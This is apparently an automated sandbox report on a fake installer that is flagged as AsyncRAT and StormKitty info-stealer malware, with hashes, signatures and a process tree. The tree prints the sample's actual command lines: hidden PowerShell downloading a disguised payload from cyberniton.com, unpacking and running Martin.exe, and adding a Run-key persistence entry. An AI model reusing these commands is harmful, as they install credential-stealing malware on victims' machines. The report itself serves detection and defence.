Analysis
- max time kernel: 145s
- max time network: 162s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 04-11-2024 13:52
Static task: static1

Behavioral tasks (task: sample, resource)
- behavioral1: Installer_x64_Final_Release.exe, win7-20240903-en
- behavioral2: Installer_x64_Final_Release.exe, win10v2004-20241007-en
- behavioral3: app-11.17.0/Installer_x64_Final_Release.exe, win10v2004-20241007-en
- behavioral4: app-11.17.0/Squirrel-UpdateSelf.log, win7-20240903-en
- behavioral5: app-11.17.0/Squirrel-UpdateSelf.log, win10v2004-20241007-en
- behavioral6: app-11.17.0/chrome_100_percent.pak, win7-20241010-en
- behavioral7: app-11.17.0/chrome_100_percent.pak, win10v2004-20241007-en
- behavioral8: app-11.17.0/chrome_200_percent.pak, win7-20241010-en
- behavioral9: app-11.17.0/chrome_200_percent.pak, win10v2004-20241007-en
- behavioral10: app-11.17.0/d3dcompiler_47.dll, win10v2004-20241007-en
- behavioral11: app-11.17.0/ffmpeg.dll, win7-20240708-en
- behavioral12: app-11.17.0/ffmpeg.dll, win10v2004-20241007-en
- behavioral13: app-11.17.0/icudtl.dat, win7-20240903-en
- behavioral14: app-11.17.0/icudtl.dat, win10v2004-20241007-en
- behavioral15: app-11.17.0/libEGL.dll, win7-20240903-en
- behavioral16: app-11.17.0/libEGL.dll, win10v2004-20241007-en
- behavioral17: app-11.17.0/libGLESv2.dll, win7-20241010-en
- behavioral18: app-11.17.0/libGLESv2.dll, win10v2004-20241007-en
- behavioral19: app-11.17.0/locales/en-GB.pak, win7-20240903-en
- behavioral20: app-11.17.0/locales/en-GB.pak, win10v2004-20241007-en
- behavioral21: app-11.17.0/locales/en-US.pak, win7-20240729-en
- behavioral22: app-11.17.0/locales/en-US.pak, win10v2004-20241007-en
- behavioral23: app-11.17.0/locales/uk.pak, win7-20240903-en
- behavioral24: app-11.17.0/locales/uk.pak, win10v2004-20241007-en
- behavioral25: app-11.17.0/locales/vi.pak, win7-20241010-en
- behavioral26: app-11.17.0/locales/vi.pak, win10v2004-20241007-en
- behavioral27: app-11.17.0/locales/zh-CN.pak, win7-20240903-en
- behavioral28: app-11.17.0/locales/zh-CN.pak, win10v2004-20241007-en
- behavioral29: app-11.17.0/locales/zh-TW.pak, win7-20240903-en
- behavioral30: app-11.17.0/locales/zh-TW.pak, win10v2004-20241007-en
- behavioral31: app-11.17.0/resources.pak, win7-20240729-en
- behavioral32: app-11.17.0/resources.pak, win10v2004-20241007-en

General
- Target: app-11.17.0/Installer_x64_Final_Release.exe
- Size: 95.5MB
- MD5: f2f9c5b1eb68455185007b88f103d600
- SHA1: 84ab052e850735cda8f89c699863217e4f21fbbf
- SHA256: 8d98a2d11c274829ecf4d8ec77762aafd94cae3d731de25e09d7e7eeb9f74088
- SHA512: 6079f76fa212be5dbc301aa59c049a29a5c5671a94b48b416f64297777276dd2646676b47923dbfe5df5b61c54627c8221ea4fdd5b1d3a5c58e778bc85aa8bf2
- SSDEEP: 1536:brae78zjORCDGwfdCSog01313QAjs5g+lmiujO3TlP76kn:RahKyd2n31n45vkSTlPJn

Malware Config
Signatures
Asyncrat family

StormKitty
StormKitty is an open source info stealer written in C#.

StormKitty payload 1 IoCs
- resource: behavioral3/memory/4760-138-0x0000000000400000-0x000000000064A000-memory.dmp
  yara_rule: family_stormkitty

Stormkitty family

Blocklisted process makes network request 2 IoCs
- flow 26, pid 3308, Process powershell.exe
- flow 53, pid 3708, Process powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run PowerShell and hide display window.
- pid 4060, Process powershell.exe
- pid 3056, Process powershell.exe
- pid 1744, Process powershell.exe
- pid 3708, Process powershell.exe
- pid 3308, Process powershell.exe
- pid 3308, Process powershell.exe
- pid 3708, Process powershell.exe

Executes dropped EXE 1 IoCs
- pid 1808, Process Martin.exe

Loads dropped DLL 2 IoCs
- pid 1808, Process Martin.exe
- pid 1808, Process Martin.exe

Adds Run key to start application 2 TTPs 2 IoCs
- description: Set value (str)
  ioc: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""
  Process: Installer_x64_Final_Release.exe
- description: Set value (str)
  ioc: \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Martin = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\Martin\" \"C:\\Users\\Public\\Downloads\\Martin\\Martin.exe\""
  Process: powershell.exe

Suspicious use of SetThreadContext 1 IoCs
- description: PID 1808 set thread context of 4760
  pid: 1808
  Process: Martin.exe
  procid_target: 104

Program crash 1 IoCs
- pid 4524, pid_target 4760, Process WerFault.exe, procid_target 104

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
- description: Key opened
  ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
  Process: AddInProcess32.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs
- pid 3308, Process powershell.exe
- pid 3308, Process powershell.exe
- pid 4060, Process powershell.exe
- pid 4060, Process powershell.exe
- pid 3056, Process powershell.exe
- pid 3056, Process powershell.exe
- pid 1744, Process powershell.exe
- pid 1744, Process powershell.exe
- pid 3708, Process powershell.exe
- pid 3708, Process powershell.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs
Suspicious use of WriteProcessMemory 26 IoCs
Processes
- C:\Users\Admin\AppData\Local\Temp\app-11.17.0\Installer_x64_Final_Release.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\app-11.17.0\Installer_x64_Final_Release.exe"
  PID: 2480
  Signatures: Adds Run key to start application; Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c sora.bat
    PID: 1324
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\curl.exe
      Command line: curl -X GET https://cyberniton.com/star/process.php
      PID: 4956
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://cyberniton.com/Storage/Martin.jpg' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Martin.zip'"
      PID: 3308
      Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -WindowStyle Hidden -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\Martin.zip' -DestinationPath 'C:\Users\Public\Downloads\Martin' -Force"
      PID: 4060
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -WindowStyle Hidden -Command "Set-Location -Path 'C:\Users\Public\Downloads\Martin'; Start-Process 'Martin.exe'"
      PID: 3056
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Users\Public\Downloads\Martin\Martin.exe
        Command line: "C:\Users\Public\Downloads\Martin\Martin.exe"
        PID: 1808
        Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          PID: 4760
          Signatures: System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
          - C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 1316
            PID: 4524
            Signatures: Program crash
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -WindowStyle Hidden -Command "Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Martin' -Value 'cmd.exe /C start \"\" /D \"C:\Users\Public\Downloads\Martin\" \"C:\Users\Public\Downloads\Martin\Martin.exe\"'"
      PID: 1744
      Signatures: Command and Scripting Interpreter: PowerShell; Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c sorast.bat
    PID: 2944
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://cyberniton.com/Storage/Martinst.jpg' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Martinst.zip'"
      PID: 3708
      Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4760 -ip 4760
  PID: 2260

Network
MITRE ATT&CK Enterprise v15
Downloads